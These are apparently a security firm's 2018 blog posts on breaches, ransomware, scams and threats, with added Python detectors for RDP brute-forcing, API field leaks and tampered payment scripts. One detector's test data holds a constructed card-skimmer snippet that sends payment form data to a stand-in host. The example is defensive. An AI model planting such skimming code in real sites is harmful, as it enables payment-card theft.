Secret Sister Returns to Facebook Just in Time for the Holidays

If successful, the end result is the same. A few people at the top of the pyramid will receive hundreds of gifts that they can either keep or resell for cash while most participants end up with nothing.

Chain letter, pyramid scheme or gateway to identity theft, this is one holiday tradition you would be wise to avoid, according to both the Better Business Bureau and the police.

From Post Office Plague to Social Media Manipulation

Back in the good old days chain letters such as the Secret Sister relied on the hopes and dreams of unwitting participants and the US Postal Service. Today the hopes and dreams are still required, but the Post Office has been replaced by Facebook.


More Than Disappointing, It’s Illegal

OK, so perhaps the prospect of spending $10 on a gift on the off chance that the Secret Sister post you received from a relative or friend is “legit” holds some appeal and not a lot of downside. Well, that’s where you could be wrong. According to the US Postal Service:

There’s at least one problem with chain letters. They’re illegal if they request money or other items of value and promise a substantial return to the participants. Chain letters are a form of gambling, and sending them through the mail (or delivering them in person or by computer, but mailing money to participate) violates Title 18, United States Code, Section 1302, the Postal Lottery Statute. (Chain letters that ask for items of minor value, like picture postcards or recipes, may be mailed, since such items are not things of value within the meaning of the law.)

While the chance that your participation in a Secret Sister chain letter (or chain post, as it were) will lead to any serious run-ins with the law is pretty slim, perhaps even less likely than your actually receiving a gift, it’s noteworthy that the US Postal Inspection Service dedicates an entire page to chain letters!

’Tis Better to Give Than Receive

Perhaps the real lesson here is that giving and sharing with others is what makes the Holiday Season so special. So go ahead and find ways to give to others that don’t involve a Secret Sister or similar chain concept and share and enrich the lives of friends, family and even complete strangers.

SamSam Held Atlanta Ransom. Who’s Next?



We’ve written quite a bit about municipalities large and small (think Atlanta, GA and Batavia, IL) becoming the focus of hackers and cybercriminals. Today we’ll shed a little more light on the malware that brought Atlanta to its knees in March.
SamSam for Ransom
Dubbed SamSam, this highly profitable group of malware maestros earned a portion of the SophosLabs 2019 Threat Report from researchers at Sophos. Sophos describes SamSam’s highly personalized, high-touch ransomware attacks as being akin to a “cat burglar,” as opposed to the “smash and grab” approach of automated ransomware attacks that utilize commodity ransomware such as GandCrab.

The Advantages of Being Hands-On
Rather than relying on automation to rapidly attack hundreds of systems at once and hoping that some sort of exploitable vulnerability surfaces, for nearly 3 years SamSam has applied an old-school, hands-on approach to infiltration and infection. It typically begins by brute-forcing RDP passwords on internet-exposed hosts, then moving laterally until domain admin credentials are harvested. With these credentials in hand SamSam waits for just the right moment, say Friday evening on a holiday weekend, to strike, pushing the malware out to as many machines as possible simultaneously so that backups and incident responders are overwhelmed at once.
This high-touch, cat burglar approach has allowed SamSam to focus on vulnerable targets with deep pockets and has yielded known ransom payments totaling $6.5 million in a little under 3 years.
Imitation is the Sincerest Form of Flattery
Even though the mysterious folks behind SamSam do not appear to collaborate, or even brag in forums, their high-value exploits have not gone unnoticed, and several imitators have emerged, such as the ultra-high-ransom group BitPaymer, which reportedly charges ransoms in the $50,000 to $1 million range.
Konsultek’s Recommendation – Rein in RDP and Get the Fundamentals Locked Down
Since many of the worst manual ransomware attacks have relied upon Windows Remote Desktop as a point of entry, it stands to reason that securing this avenue of ingress should be a top priority. In practice that means not exposing RDP directly to the internet (put it behind a VPN or gateway), requiring multi-factor authentication and Network Level Authentication, and enforcing an account lockout policy so that password guessing is slow and noisy enough to be noticed. Once this basic exposure is closed you should also make sure that your team is practicing good password management and keeping systems up to date and patched. Even the most sophisticated security solutions will be hamstrung if sloppy network hygiene virtually invites hackers in!
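The entry pattern described above, a burst of failed RDP logons followed by a success from the same address, is easy to spot in the Windows Security log if anyone is looking. The following is an added example of that detection logic, written for this post rather than taken from Sophos or from any product. It assumes a simplified comma-separated export of logon events (timestamp, event ID, logon type, source IP, account); the event lines themselves are constructed for illustration.

```python
"""Detect RDP password brute-forcing in Windows logon events.

Added example (not from the original post or from Sophos). Flags a source
address that racks up many failed logons (event 4625) within a short window
and, worse, a subsequent successful RemoteInteractive logon (event 4624,
logon type 10) from that same address. The export format and the event
lines below are assumptions constructed for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: timestamp, event id, logon type, source IP, account.
SAMPLE_EVENTS = """\
2018-03-22T02:14:07Z,4625,10,203.0.113.7,administrator
2018-03-22T02:14:09Z,4625,10,203.0.113.7,administrator
2018-03-22T02:14:11Z,4625,10,203.0.113.7,admin
2018-03-22T02:14:13Z,4625,10,203.0.113.7,svc_backup
2018-03-22T02:14:15Z,4625,10,203.0.113.7,administrator
2018-03-22T02:14:40Z,4624,10,203.0.113.7,svc_backup
2018-03-22T02:15:02Z,4625,10,198.51.100.20,jsmith
2018-03-22T02:16:30Z,4624,10,198.51.100.20,jsmith
2018-03-22T09:00:00Z,4625,10,203.0.113.7,administrator
"""


def parse_events(text):
    """Parse the assumed CSV export into dicts, ordered by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, src, user = line.split(",")
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "src": src,
            "user": user,
        })
    return sorted(events, key=lambda e: e["time"])


def detect_rdp_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Return findings as (severity, source_ip, description) tuples.

    A source reaching `threshold` failures inside `window` is reported once
    at medium severity; a successful RDP logon while that source is still
    over the threshold is reported at high severity with the account used.
    """
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    alerted = set()
    findings = []
    for e in events:
        if e["logon_type"] != 10:   # 10 = RemoteInteractive, i.e. RDP
            continue
        recent = failures[e["src"]]
        while recent and e["time"] - recent[0] > window:
            recent.popleft()        # slide the window forward
        if e["event_id"] == 4625:
            recent.append(e["time"])
            if len(recent) >= threshold and e["src"] not in alerted:
                alerted.add(e["src"])
                findings.append(("medium", e["src"],
                                 f"{len(recent)} failed RDP logons within {window}"))
        elif e["event_id"] == 4624 and len(recent) >= threshold:
            findings.append(("high", e["src"],
                             f"successful RDP logon as {e['user']} "
                             f"after {len(recent)} failures"))
    return findings


if __name__ == "__main__":
    for severity, src, text in detect_rdp_brute_force(parse_events(SAMPLE_EVENTS)):
        print(f"[{severity}] {src}: {text}")
```

On the sample data the script reports the 203.0.113.7 burst and then the successful logon as svc_backup that follows it, while the single failed attempt from 198.51.100.20 stays quiet. A fixed threshold like this will miss a patient attacker who spreads guesses across hours or across many source addresses, which is one more reason to keep RDP off the internet rather than rely on detection alone.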
If you’d like a free visibility report to potential problems mentioned in this blog, please contact us immediately.

Is Automation the Key to Lower Incident Response Times?

This year’s SANS Endpoint Security Survey report is loaded with interesting statistics such as:

  • 42% of IT professionals acknowledged they had suffered a breach on their endpoints.
  • 20% said they did not know if they had been breached.
  • 82% of those that knew of a breach said it had involved a desktop.
  • 69% cited corporate laptops.
  • 42% cited employee-owned laptops.
  • 47% said antivirus tools had detected the threat.
  • 26% of breaches were detected by endpoint detection and response (EDR) capabilities.

It was this last response that was of particular interest, so we took a deeper dive.

Endpoints Up, Response Times Down

One of the challenges facing security professionals is the seemingly ever expanding number of endpoints that need to be monitored. It’s akin to having an ever expanding fence line that needs to be patrolled and maintained by a rancher to prevent loss of livestock to predators.


Interestingly enough, despite the growth in endpoints this year’s report showed that incident response times are actually decreasing. One of the primary reasons for this is automated endpoint detection and response (EDR) capabilities.

Are you Automated?


If you have purchased and fully implemented a next-gen EDR solution you can consider yourself and your organization firmly ahead of the curve. As SANS analyst and survey author Lee Neely states in the report:


“The diversity and quantity of endpoints in the modern enterprise are driving the need for more automation and predictive capabilities. While [organizations] are purchasing solutions to keep ahead of the emerging cyber threats, they appear to fall short on implementing the key purchased capabilities needed to protect and monitor the endpoint.”

In fact, to be more specific:

“Of the IT professionals that had acquired next-gen endpoint security solutions, 37% haven’t implemented their full capabilities”.

Let Konsultek Help You Automate

The SANS Incident Response Survey shows that the largest number of respondents had a “time to detect” between 6 and 24 hours, a “time to contain” of 2 to 7 days and finally a “time to remediate” of 2 to 7 days. As security professionals looking to secure an ever more complex endpoint “fence line,” how do we accelerate incident response? The obvious answer is machine-based automation.

Curious as to how that might work in your organization’s network? We’d be happy to explain! Just give us a call to discuss how a Konsultek custom security solution can take your organization to a whole new level of security.


Facebook Breathes Sigh of Relief as Google+ Glitch Draws Regulator Attention

A couple weeks back we reported that Facebook was in the cross-hairs of regulators and litigants around the world as a result of their latest breach. Well this week some of that unwanted attention was turned from Facebook to rival Google.

Google+ Attains “Me Too” Status with Breach

Google+ was a failed “me too” attempt by Google to compete with Facebook that never worked well and never threatened Facebook’s market share, yet through its own security flaws it has finally reached parity with, or perhaps even bested, Facebook at some level.

Should Have Shut it Down a Long Time Ago

The flaw, first brought to the public’s attention in a news article last week, would never have happened had Google parent company Alphabet, Inc. performed some product line pruning years ago. It’s been clear for years to even the most casual observer that Google+ was a flop and would never gain widespread acceptance or use.

Instead, Google found itself with a flaw exposing the data of some 500,000 users from 2015 until it was discovered earlier this year, and decided not to disclose it, “in part because of fears that doing so would draw regulatory scrutiny and cause reputational damage.” To their credit, Google fixed the flaw immediately upon finding it; they just hoped no one would ever learn about its prior existence.

The Flaw

A Google internal review team discovered the API vulnerability which impacted approximately 500,000 accounts. The flaw allowed the API to grant access to information on a user’s profile which hadn’t been marked as public. Google sources state that access was granted to information such as name, occupation and age. Phone numbers and other more personal information stored on your Google account remained safe. We can only hope that this is true since all of your Google related properties from Gmail, to contacts to AdWords and YouTube are all linked together.
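The class of bug described above, an API that returns profile fields without consulting the owner’s visibility settings, is worth seeing side by side with its fix. The following is an added illustration written for this post; it is not Google’s code, and the field names, visibility levels, scope name and caller model are all assumptions.

```python
"""Field-level visibility filtering in a profile API.

Added illustration of the kind of flaw described above; not Google's code.
Field names, visibility levels, the "profile.read" scope and the caller
model are assumptions. The vulnerable handler returns whatever non-public
fields a third-party app asks for; the hardened one checks the app's
granted scope and each field's visibility setting before releasing it.
"""
from dataclasses import dataclass, field


@dataclass
class Profile:
    owner: str
    fields: dict                      # field name -> stored value
    visibility: dict                  # field name -> "public" | "friends" | "private"
    friends: set = field(default_factory=set)


@dataclass
class Caller:
    app_id: str
    acting_user: str                  # the user who authorised the app
    scopes: set = field(default_factory=set)


def profile_get_vulnerable(profile, caller, requested):
    """Flaw: the request is honoured as-is; visibility settings are never consulted."""
    return {name: profile.fields[name] for name in requested if name in profile.fields}


def visible_to(profile, name, caller):
    """Is field `name` viewable by the user on whose behalf the app is acting?"""
    level = profile.visibility.get(name, "private")   # unknown fields default closed
    if caller.acting_user == profile.owner:
        return True                                   # owners always see their own data
    if level == "public":
        return True
    if level == "friends":
        return caller.acting_user in profile.friends
    return False


def profile_get_hardened(profile, caller, requested):
    """Refuse the call without the scope; otherwise release only visible fields."""
    if "profile.read" not in caller.scopes:
        raise PermissionError(f"app {caller.app_id} lacks profile.read scope")
    return {name: profile.fields[name] for name in requested
            if name in profile.fields and visible_to(profile, name, caller)}


# Constructed sample profile: only the name is public, occupation is
# friends-only, age and e-mail are private.
ALICE = Profile(
    owner="alice",
    fields={"name": "Alice", "occupation": "engineer", "age": 34,
            "email": "alice@example.com"},
    visibility={"name": "public", "occupation": "friends",
                "age": "private", "email": "private"},
    friends={"bob"},
)

if __name__ == "__main__":
    stranger = Caller("app-1", "carol", {"profile.read"})
    wanted = ["name", "occupation", "age", "email"]
    print("vulnerable:", profile_get_vulnerable(ALICE, stranger, wanted))
    print("hardened:  ", profile_get_hardened(ALICE, stranger, wanted))
```

The important design point is that the check runs per field, against the data owner’s settings, rather than once per request against the caller’s credentials: an app can be perfectly authorised by one user and still have no business seeing what a different user marked private.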

Taking Heat

The flaw, by today’s standards, seems rather benign, and, spun correctly, Google might have come away smelling like the proverbial rose. Instead, by covering it up they are drawing some serious heat from Congress.

  • Senators John Thune, Roger Wicker and Jerry Moran want answers. The trio sent a letter to Google CEO Sundar Pichai requesting information about the nature of the company’s response to the discovery of the glitch.
  • Senator Chuck Grassley (R-Iowa) wrote directly to Google CEO Sundar Pichai on Friday. Grassley pressed on why Google had declined to participate in earlier Congressional hearings in April that focused on Facebook.

Konsultek’s Take

Social networks such as Google+ and Facebook pose a tremendous threat to the privacy of individuals and corporations who choose to use them. The use of a single Google login to access multiple properties means that the breach of a singular system, in fact, represents the breach of potentially hundreds. Extreme caution with social media has always been advised and this latest breach drives that home. While convenient, using shared credentials for access should be avoided as a security best practice.



The Direct Simplicity of Hacking Cryptocurrency Exchanges for Cash

While many cybercriminals steal identities, credit card numbers and other personally identifiable information, there is a rapidly growing group of cyberthieves who are targeting something far more easily turned into profit: cryptocurrencies. Forget the arduous task of selling thousands, hundreds of thousands or even millions of pieces of information on the dark web. Instead, steal cryptocurrencies, exchange them for the hard currency of your choice and you are done!


2018 Crypto-Exchange Theft Up 250%… Already

According to the most recent report issued by CipherTrace $927 Million worth of cryptocurrencies have been stolen in the first 9 months of 2018, an increase of 250% over 2017 and we still have 3 more months left in the year.

Source: CipherTrace – 2018 Q3 Cryptocurrency Anti-Money Laundering Report




Will Regulation Help Slow Things Down?

Is the key to stopping exchange theft more than just improved security technology? Many believe that increased anti-money laundering (AML) regulation holds at least part of the answer. Their rationale is that thieves need to exchange and launder their haul of illicit crypto, and most of this laundering is done through exchanges in countries with weak to no AML regulation, as the CipherTrace report illustrates.

For Facebook the Hacks Just Keep Getting Bigger

In an ironic twist that Mark Twain would have been proud of, Facebook’s most recent and largest breach to date stems from a feature Facebook added to give users more control over their privacy!

“View As” Gives More Than a View

Bugs in Facebook’s “View As” feature were exploited by hackers. The flaws enabled them to obtain access tokens, the bearer credentials that keep a user logged in, which allowed them to act as genuine Facebook users without ever needing a password. Ouch! I guess my 20-character randomly generated password wasn’t much of a deterrent when you have a backdoor like that!

All told, nearly 50 million user accounts were compromised on Facebook including those of Mark Zuckerberg himself and Sheryl Sandberg, Facebook’s COO. When you factor in that many people use their Facebook account to access other services such as Spotify, Tinder and hundreds of others, the extent of the compromised accounts grows to staggering.

Do We Have Your Attention Now?

Facebook was already arguably under more scrutiny than any other company for its past security transgressions such as those involving Cambridge Analytica and “Fake News” but this latest episode is sure to garner the attention of even more individuals, lawyers and regulators both here and abroad. Two individuals here in the US have already filed lawsuits that they hope will become class-action lawsuits.

GDPR Could Cost Billions

GDPR went into effect on May 25th of this year, and that may have serious consequences for Facebook. If Facebook is found to be in breach of GDPR for failing to adequately protect user data they could be facing the largest security-related fine in history. Under GDPR, a guilty party faces a fine of up to €20 million or 4% of global annual turnover, whichever is greater. In Facebook’s case, 4% of revenue represents a whopping $1.63 billion!

The Final Irony

Stories spread rapidly on Facebook. Real news and fake news alike and Facebook has taken tremendous heat for allowing fake news stories to proliferate across their platform. But, what is fake and what is real? And, with 2.2 billion users, who decides?

Well, in the final ironic twist to this story, Facebook was the one place you couldn’t learn about the latest breach. Why? So many users posted stories about the breach that Facebook’s spam filters judged the activity suspicious and removed the posts as spam!

Konsultek’s Take

Social networks such as Facebook pose a tremendous threat to the privacy of individuals and corporations who choose to use them. The use of a single Facebook login to access multiple properties means that the breach of a singular system, in fact, represents the breach of potentially hundreds. Extreme caution with social media has always been advised and this latest breach drives that home. While convenient, using shared credentials for access should be avoided as a security best practice.

22-Line Code “Scalpel” Removes British Airways Customer Data

A couple weeks ago British Airways confirmed that the personal data of 380,000 customers had been stolen.

Magecart Again. Still?

On September 11th the simplicity of this surgical strike was revealed by RiskIQ, and the details are pretty amazing. According to RiskIQ the incident, which lasted 15 days, was very similar to the breach of Ticketmaster UK earlier in the year. That similarity, combined with crawl data, allowed them to quickly confirm that the threat actors were one and the same: Magecart.

Magecart is a group of criminals that specialize in web based credit card skimmers. RiskIQ actively monitors 2 billion pages of the world wide web for Magecart activity and Magecart is so active that RiskIQ gets hourly notifications of sites being hacked!

The 22 Line Scalpel

In the case of the British Airways hack, Magecart slightly modified their code so it went unnoticed by the RiskIQ automated crawlers, and only after the fact could RiskIQ manually identify their handiwork. It turned out that just 22 lines of JavaScript, slipped into a script already served by the site, excised the personal data of 380,000 customers.

The same code also appears to have affected the British Airways mobile app for the same period of time. This is because the app was developed as an empty shell that simply pulled in functionality from the desktop site. While past Magecart attacks grabbed form data indiscriminately, these 22 lines were highly targeted, extracting payment information and sending it off to their own servers.
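The lesson of a 22-line addition to a script the site already served is that any change to a script on a payment page, however small, needs to be noticed. The following is an added example, written for this post rather than taken from RiskIQ or British Airways: it keeps a baseline content hash (in the same form a Subresource Integrity attribute uses) for each hosted script, flags a fetched copy that no longer matches, and lists any network destinations in the changed copy that are not on an allow-list. The two script bodies are constructed stand-ins, not the real skimmer, and the host names are assumptions.

```python
"""Detect tampering of a hosted JavaScript file with a content hash.

Added example, not RiskIQ's crawler or British Airways code. A defender
records a baseline SRI-style hash of every script served on a payment page;
a copy that no longer matches is flagged and scanned for hosts outside an
allow-list. The script bodies and host names below are constructed.
"""
import base64
import hashlib
import re

# Constructed: the script as originally deployed on the page.
BASELINE_JS = """
function validateCard(form) {
  return /^\\d{13,19}$/.test(form.cardNumber.value.replace(/\\s/g, ""));
}
"""

# Constructed: the same script with a few lines appended that serialise the
# payment form when the submit button is released and post it elsewhere.
TAMPERED_JS = BASELINE_JS + """
document.getElementById("submitButton").addEventListener("mouseup", function () {
  var data = JSON.stringify($("#paymentForm").serializeArray());
  navigator.sendBeacon("https://exfil.example/gateway/api", data);
});
"""

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sri_hash(content, algo="sha384"):
    """Return the content hash in Subresource Integrity form: 'sha384-<base64>'."""
    digest = hashlib.new(algo, content.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def integrity_attribute(content):
    """Attribute text to put on the <script> tag so a modified copy is refused."""
    return f'integrity="{sri_hash(content)}" crossorigin="anonymous"'


def foreign_hosts(content, allowed_hosts):
    """Host names referenced by absolute URLs in the script that are not allowed."""
    return sorted({h for h in URL_RE.findall(content) if h not in allowed_hosts})


def check_script(fetched, baseline_hash, allowed_hosts):
    """Compare a freshly fetched script against its baseline; return findings."""
    findings = []
    if sri_hash(fetched) != baseline_hash:
        findings.append("hash mismatch: script content changed since baseline")
        for host in foreign_hosts(fetched, allowed_hosts):
            findings.append(f"changed script references unapproved host {host}")
    return findings


if __name__ == "__main__":
    baseline = sri_hash(BASELINE_JS)
    allowed = {"www.example.com"}
    print("baseline tag:", integrity_attribute(BASELINE_JS))
    print("unchanged:", check_script(BASELINE_JS, baseline, allowed))
    print("tampered: ", check_script(TAMPERED_JS, baseline, allowed))
```

Two caveats a practitioner should keep in mind. A hash comparison only catches what you baseline, so every script loaded on the checkout page, including third-party and mobile-app-embedded ones, has to be in the inventory. And an integrity attribute in the page markup protects only the fetched script; if the attacker can rewrite the HTML that carries the hash, the browser check is moot, which is why an out-of-band monitor like this one still earns its keep.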

Konsultek Knows Security

Threat prevention, detection and quarantine are the hallmarks of a robust security solution. If your current approach to network security is a patchwork quilt of boxes and software that has been cobbled together over time it’s probably time to have us perform a comprehensive review. Simply give us a call and we’ll schedule a time to chat. It’s really that easy to get started.

Power Transmission Substation Honeypot Yields Unexpected Results

We’ve discussed the security of critical infrastructure many times on this blog. From the hijacking of the Dallas, TX tornado warning system, to discussions at Davos, selfies revealing sensitive information and even a video showing a white hat hacker team physically compromising a substation security system.

The security of the nation’s critical infrastructure is, well, critical, so we were quite intrigued by a recent honeypot experiment conducted by researchers at Cybereason.

Honeypot Yields Unexpected Results

Looking to further understand the threats facing critical infrastructure, Cybereason set up a honeypot late in Q2 2018 that emulated the network of a major electric provider’s power transmission substation. All significant network systems, including an IT environment, an OT environment and an HMI (human-machine interface) management system, were included in the honeypot to make it appear as legitimate a network as possible.


Cybereason expected the honeypot to reveal attack vectors that targeted individuals with network access. Instead, what they found was that the honeypot was compromised by a set of actors who bought their access on a dark web market!

According to Cybereason CISO Israel Barak, the honeypot infrastructure was first discovered by a black-market seller conducting a broad internet reconnaissance. “The seller was able to compromise a single machine in the honeypot and posted it for sale in a black market called xDedic – along with the network identifiers of the compromised environment, which disclosed its probable affiliation with a large utility provider.”

Dark Web = Lights Out?

While the genesis of the threat, purchasing access off the dark web, was unexpected, Cybereason believes that those using the purchased access are very familiar with ICS environments. They moved quickly from the honeypot’s IT environment into the OT (operational technology) environment, which is the environment that actually controls the equipment used to deliver the utility in question, whether it be electricity, natural gas or water. The attackers appear to have been singularly focused on getting to the OT network. And while some of their techniques were sloppy and raised red flags that would likely have elicited a security team’s response, had they been left unchallenged it appears they could well have achieved their goal.

Can We Help You Achieve Your Goals?

When it comes to security, having an end goal in mind makes sense. Let us help you discover what goals make sense for your organization. It’s simple to get started, we’re just a phone call away.



Cortana – Let’s Start Hacking!


If you’ve ever witnessed the breadth of friendly Alexa hijinks going on in the world you could predict that hackers exploiting voice command vulnerabilities would just be a matter of time.

Well, that time is now. Voice hacking is a real and growing threat according to a mounting body of evidence.

Open Sesame

Yesterday afternoon (8/8/18) attendees at a security conference in Las Vegas were treated to a presentation by a group of Israeli students and researchers who revealed what they are calling the “Open Sesame” vulnerability in Cortana.

According to the session overview…

In this presentation, we will reveal the “Open Sesame” vulnerability, a much more powerful vulnerability in Cortana that allows attackers to take over a locked Windows machine and execute arbitrary code. Exploiting the “Open Sesame” vulnerability attackers can view the contents of sensitive files (text and media), browse arbitrary web sites, download and execute arbitrary executables from the Internet, and under some circumstances gain elevated privileges. To make matters even worse, exploiting the vulnerability does not involve ANY external code, nor shady system calls, hence making code focused defenses such as Antivirus, Anti-malware and IPS blind to the attack.

Hackers Never Sleep

As technology continues to integrate into every aspect of our lives we can expect new and different vulnerabilities to emerge. Unfortunately, the hacking and cyber-criminal community never sleeps when it comes to identifying and exploiting these vulnerabilities for their profit at your expense.

Konsultek Stands Vigil

That’s where Konsultek comes in. Our custom security solutions are based upon the most advanced architectures and tools available and stand guard 24x7x365 to keep your networks and information secure. If you are looking for a security partner that is constantly innovating and keeping ahead of the curve please give us a call. Konsultek – your vigilant security partner.

If you’re interested in a complimentary Executive Risk Assessment, just pick up the phone and give us a call to schedule your first step towards greater security.

You’ll understand where your most important digital assets are, what the impact and likelihood of an incident is, and how to protect those assets. Why wouldn’t you want to learn something about your business you didn’t know, for free?

Reporter Trolls the Russian Dark Web and Finds…


Dylan Curran, writing for the Guardian, recently published a fascinating look at the world of Russian Dark Web hacking forums.

Knowledge is Power

You may recall that we took a look at dark web forums previously here, here and here. Well, in case you are under the false impression that the dark web has been scrubbed clean or had the bright light of justice shone upon it, you’ll be disappointed to learn that the dark web is not just alive, but thriving!


Dylan’s deep dive was into just one of the larger hacking forums, called FreeHacks, which divides itself into no fewer than 17 different hacking-related sub-forums (granted, one of those sub-forums is “Humor”) to meet the needs of its 5,000 or so members.

Unlike some of the sites we’ve chronicled in the past, FreeHacks is focused on education and sharing and in this way really highlights the difference in mindset between Russian hackers and those in Western countries.

Collaboration vs. Independence

On FreeHacks information and instruction on a very detailed and granular level are being openly shared for the greater good of the community. This is in contrast to Western hackers who are more apt to keep a lower profile, less openly sharing knowledge and less likely to collaborate with strangers in order to maintain as much anonymity (and competitive advantage?) as possible.

Konsultek Collaborates Too

At Konsultek we understand that the best security solutions come from collaborating with the top firms and brightest minds in the industry. That’s why we’re proud to partner with industry thought leaders at ForeScout, Check Point, SentinelOne, Gigamon, IntSights and more. Are you looking to collaborate with a local leader with a global reach? Look no further! If you’re interested in a complimentary Risk Assessment, just pick up the phone and give us a call to schedule your first step towards greater security.

Understand where your most important digital assets are, what the impact and likelihood of an incident is, and how to protect those assets.

© Copyright 2018 Konsultek